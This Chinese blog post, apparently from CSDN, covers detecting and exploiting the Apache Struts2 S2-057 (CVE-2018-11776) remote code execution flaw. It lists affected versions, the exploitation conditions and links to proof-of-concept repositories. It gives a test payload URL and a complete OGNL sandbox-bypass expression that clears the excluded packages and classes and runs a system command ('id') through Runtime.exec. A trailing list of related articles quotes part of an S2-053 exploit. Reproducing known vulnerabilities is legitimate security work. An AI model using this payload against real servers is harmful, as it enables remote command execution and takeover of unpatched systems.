S2-057远程代码执行漏洞检测与利用

最新推荐文章于 2023-08-10 17:05:04 发布
最新推荐文章于 2023-08-10 17:05:04 发布
阅读量2.3k 收藏
点赞数
分类专栏: 漏洞利用 文章标签: S2-057 代码执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29647709/article/details/84971376
版权

Apache wiki更新了一个Struts2的远程代码执行漏洞(S2-057),漏洞威胁等级为高危,漏洞对应的CVE编号为CVE-2018-11776。 定义XML配置时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。

漏洞记录

漏洞编号:S2-057(CVE-2018-11776)

漏洞影响:远程代码执行

受影响版本:<=Struts 2.3.34,Struts 2.5.16

漏洞修复:升级至最新版本

Apache wiki链接:https://cwiki.apache.org/confluence/display/WW/S2-057

利用条件

利用条件:

  • alwaysSelectFullNamespace操作元素没有设置命名空间属性,或者使用通配符。
  • 命名空间将由用户从uri传递,并被解析为OGNL表达式,最终导致远程代码执行漏洞。

检测利用

本地验证:https://github.com/ym2011/POC-EXP/tree/master/Struts2/S2-057

在线验证1:http://0day.websaas.com.cn/

详细验证:https://lgtm.com/blog/apache_struts_CVE-2018-11776
有效载荷:

http://192.168.1.15:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action
$%7B233*233%7D为url编码,解码为:${233*233}

发现我们构造的payload执行了:
在这里插入图片描述
任意代码执行

${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

在这里插入图片描述

参考链接:
https://blog.csdn.net/qq_29277155/article/details/81950170
https://github.com/vulhub/vulhub/tree/master/struts2/s2-057
在这里插入图片描述

tdcoming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029远程代码执行漏洞初探1
struts2漏洞分析(S2-057为例)
hldfight
04-15 2720
0x00 前言 利用空闲时间分析了一下struts2框架的历史高危漏洞,发现除了S2-052(XStream反序列化漏洞)以外,其他漏洞的本质都是由于框架执行了恶意用户传进来的OGNL表达式,从而造成远程代码执行。只不过需要精心构造不同的OGNL代码而已。 发生OGNL表达式注入的点也是多种多样,如:请求参数名、请求参数值、content-type请求头、文件上传时的filename值、url地址...
Struts2 S2-057远程代码执行漏洞
weixin_46801402的博客
11-01 805
Struts2 S2-057远程代码执行漏洞
S2-057远程代码执行复现
最新发布
Tender*的博客
08-10 188
S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写 入到XML上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码,以及系统命令执行S2-057 先决条件 :alwaysSelectFullNamespace值为trueaction元素未设置 namespace 属性,或使用了通配符用户将从 uri 传递命名空间,并将其解析为 OGNL 表达式,最终导致远程代码执行漏洞
[Vulhub] Struts2 S2-057 S2-059 S2-061 漏洞复现
weixin_45605352的博客
06-07 1076
Struts2 S2-057 RCE (CVE-2018-11776) 0x00 漏洞描述 Apache Struts是一个现在较为主流的开源框架,是用于使用Java编程语言开发Web应用程序。 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。 url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行。 0x01 影响版本 Stru
S2-057,S2-059,s2-061,s2-062漏洞复现
xiaobai_20190815的博客
04-12 2823
一、漏洞描述 当Struts2的标签属性值引用了action对象的参数值时,便会出现OGNL表达式的二次解析,从而产生RCE风险(S2-059的修复方式为只修复了沙盒绕过并没有修复OGNL表达式执行点,因为这个表达式执行触发条件过于苛刻,导致S2-061再次绕过了S2-059的沙盒) 二、影响版本 s2-057:<=Struts 2.3.34,Struts 2.5.16 s2-059:Struts 2.0.0 - Struts 2.5.20 s2-061:Struts 2.0.0-Strut
本地复现Struts2-053漏洞
dmra71403的博客
05-14 695
漏洞环境:http://192.168.253.131/ exp: %{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.Actio...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2远程代码执行漏洞分析(S2-013)1
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
S2-057-poc
08-23
Apache Struts2 S2-057(CVE-2018-11776) 漏洞的poc脚本,可以一键验证问题所在,并且内附彩蛋,可以增长见识
tomcat远程代码执行漏洞验证
04-17
tomcat远程代码执行漏洞验证
漏洞利用与提权
09-20
ID tdcoming 的白帽子的演讲PPT,共43页。详细介绍了漏洞利用的各个步骤,值得一看
Struts2 s2-032远程代码执行分析1
08-08
Struts2 s2-032远程代码执行分析1
网站apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
网站安全专家
08-23 1324
S2-057漏洞,于2018年8月22日被曝出,该Struts2 057漏洞存在远程执行系统的命令,尤其使用linux系统,apache环境,影响范围较大,危害性较高,如果被攻击者利用直接提权到服务器管理员权限,网站数据被篡改,数据库被盗取都会发生。 目前我们SINE安全对该S2-057漏洞的测试,发现受影响的版本是Apache Struts 2.3–ApacheStruts2.3.34、Apa...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057(CVE-2018-11776)
qq_51577576的博客
12-10 518
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057(CVE-2018-11776) 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。
Apache Struts2 S2-057 漏洞POC【内附彩蛋】
大哥一声吼
08-23 7346
前导知识 官网参考链接:https://cwiki.apache.org/confluence/display/WW/S2-057 漏洞影响范围:Struts 2.3 - Struts 2.3.34, Struts 2.5 - Struts 2.5.16 CVE编号:CVE-2018-11776 最重要环节,漏洞POC: https://github.com/TheKingOfD...
S2-057 本地复现
u013224189的专栏
08-23 2444
下午正不慌不忙测着我的安卓应用呢,突然爆了个Struts2漏洞,心里咯噔一下,不会吧,上个月工作汇报还在吹水Struts2在升级OGNL后,很难由于不正当OGNL解析造成任意命令执行了。原文见: https://blog.csdn.net/u013224189/article/details/81091874 怀着不安的心情,看了下漏洞信息,踏马的,还真是这个地方。Struts2 7月份升级...
Struts2-057远程代码执行漏洞(s2-057)复现
m0_48520508的博客
12-10 855
0x00简介 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并
S2-052远程代码执行漏洞
07-27
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。 攻击者可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值